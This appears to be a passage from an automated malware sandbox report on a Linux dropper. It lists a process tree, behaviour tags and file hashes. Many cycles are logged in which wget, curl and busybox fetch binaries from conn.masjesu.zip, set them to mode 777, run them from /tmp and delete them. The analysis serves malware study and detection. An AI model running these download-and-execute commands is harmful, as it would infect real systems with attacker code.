- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:991
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:1005
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1008
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1009
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1010
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1012
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1018
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1019
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1020
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1022
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:1023
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:1024
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1025
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:1026
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1027
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:1029
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:1030
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:1031
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1032
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97